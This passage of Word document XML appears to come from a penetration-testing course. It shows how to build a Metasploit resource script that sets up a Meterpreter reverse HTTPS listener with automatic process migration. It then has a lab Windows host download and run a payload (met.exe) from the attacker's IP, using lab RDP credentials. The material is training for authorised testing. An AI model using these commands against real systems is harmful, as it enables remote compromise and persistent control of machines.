      <w:hyperlink r:id="rId156">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId157">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mousepad</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000060A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first need to think about the sequence of the commands we want to execute. For this example, the first command is to activate the multi/handler module. Then, we set the payload, which in our case, is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter_reverse_https</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Next, we can set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> options to fit our needs.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000060D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/meterpreter_reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000060E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 192.168.119.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000060F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 443</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t xml:space="preserve">In addition, we can configure the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AutoRunScript</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to automatically execute a module after a session was created. For this example, let's use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post/windows/manage/migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module. This will cause the spawned Meterpreter to automatically launch a background </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notepad.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> process and migrate to it. Automating process migration helps to avoid situations where our payload is killed prematurely either by defensive mechanisms or the termination of the related process.</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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set AutoRunScript post/windows/manage/migrate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000614">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 88 - Set AutoRunScript to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">migrate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's also set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExitOnSession</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that the listener keeps accepting new connections after a session is created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000617">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set ExitOnSession false  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000618">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 89 - Set ExitOnSession to false to keep the multi/handler listening after a connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000619">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also configure advanced options such as ExitOnSession in multi/handler and AutoRunScript in payloads by using show advanced within the activated module or selected payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we'll add run with the arguments -z and -j to run it as a job in the background and to stop us from automatically interacting with the session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -z -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 90 - Command to launch the module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000620">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000621">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's save the script and start Metasploit by entering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the resource script as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3940992" cy="3214688"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="216" name="image215.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image215.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3940992"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfconsole -r listener.rc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000625">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000626">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 91 shows that all of our commands were executed as specified in the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000627">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's connect to the BRUTE2 machine via RDP with user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">justin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperS3cure1337#</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, start PowerShell, download the malicious Windows executable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we already used in previous sections, and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000628">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="420" name="image402.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image402.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId159"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iwr -uri http://192.168.119.4/met.exe -Outfile met.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\met.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets executed, Metasploit notifies us about the incoming connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3263900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="245" name="image234.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image234.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000630">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! Metasploit automatically migrated to the newly spawned Notepad process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000631">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of creating our own resource scripts, we can also use the already provided resource scripts from Metasploit. They can be found in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/resource/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory in the Metasploit directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000632">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000633">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4081463" cy="2250037"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="109" name="image105.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image105.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4081463" cy="2250037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000634">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l /usr/share/metasploit-framework/scripts/resource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000635">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000636">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 94 shows that there are resource scripts provided for port scanning, brute forcing, protocol enumerations, and so on. Before we attempt to use them, we should thoroughly examine, understand, and modify them to fit our needs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000637">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
